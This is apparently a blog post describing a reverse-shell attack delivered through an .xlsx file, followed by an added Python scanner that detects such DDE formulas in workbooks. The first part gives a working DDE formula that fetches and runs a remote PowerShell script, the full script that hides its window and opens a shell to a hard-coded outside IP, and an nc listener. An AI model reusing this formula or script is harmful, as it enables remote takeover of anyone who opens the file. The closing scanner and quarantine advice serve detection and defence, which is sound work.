Reverse Shell via Excel (xlsx) One-Liner

Saving the below one-liner within an .xlsx file will pop a reverse shell on the target computer – at least after they click through the two warnings. I’ve been looking for an alternative method to using macro-enabled Excel documents for delivering the payload because they’re increasingly detected and blocked by spam filters.
Excel one-liner:
=cmd|’/C powershell IEX(wget http://aws.shellgam3.com/files/test.ps1)’!A0
test.ps1:
Add-Type -Name win -MemberDefinition ‘[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);’ -Namespace native
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle,0)
Invoke-Item “C:\Program Files\Microsoft Office\Office15\excel.exe”
Set-Location c:\windows\system32
$client = New-Object System.Net.Sockets.TCPClient(“52.37.49.217”,8443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
On my AWS instance, I have a simple listener running:
nc -lvp 8443
Obviously, we could get a bit more fancy with a Meterpreter shell, but I’m just keeping it simple for this POC.
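For triage of received workbooks, the following scanner flags the DDE form shown above; it is an added example, not code from the original post. It assumes the link is stored as a `ddeLink` element under `xl/externalLinks/` and that crafted files may carry the `service|'topic'!item` text directly in a sheet `<f>` element; the sample workbook parts and `example-command` are constructed.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Formula text shaped like service|'topic'!item, e.g. cmd|'/C ...'!A0
DDE_FORMULA = re.compile(r"^\s*=?\s*[\w.\\ -]+\|\s*'[^']*'\s*!")

def scan_xlsx(data):
    """Return (part, kind, detail) findings for DDE content in xlsx bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            is_link = name.startswith("xl/externalLinks/")
            is_sheet = name.startswith("xl/worksheets/")
            if not name.endswith(".xml") or not (is_link or is_sheet):
                continue
            # Stdlib parser for brevity; use a hardened XML parser on untrusted mail.
            for el in ET.fromstring(zf.read(name)).iter():
                tag = el.tag.rsplit("}", 1)[-1]  # drop the XML namespace
                if is_link and tag == "ddeLink":
                    detail = f"{el.get('ddeService')}|{el.get('ddeTopic')}"
                    findings.append((name, "ddeLink", detail))
                elif is_sheet and tag == "f" and DDE_FORMULA.match(el.text or ""):
                    findings.append((name, "formula", el.text.strip()))
    return findings

def build_sample(with_dde):
    """Constructed workbook parts for testing (not a complete, openable xlsx)."""
    ns = 'xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"'
    formula = "cmd|'/C example-command'!A0" if with_dde else "SUM(A1:A2)"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml",
                    f'<worksheet {ns}><sheetData><row r="1"><c r="A1">'
                    f"<f>{formula}</f></c></row></sheetData></worksheet>")
        if with_dde:
            zf.writestr("xl/externalLinks/externalLink1.xml",
                        f'<externalLink {ns}><ddeLink ddeService="cmd" '
                        'ddeTopic="/C example-command"/></externalLink>')
    return buf.getvalue()

if __name__ == "__main__":
    for finding in scan_xlsx(build_sample(True)):
        print(finding)
```

A hit on either check is reason to quarantine the attachment before it reaches a user who might click through the two warnings.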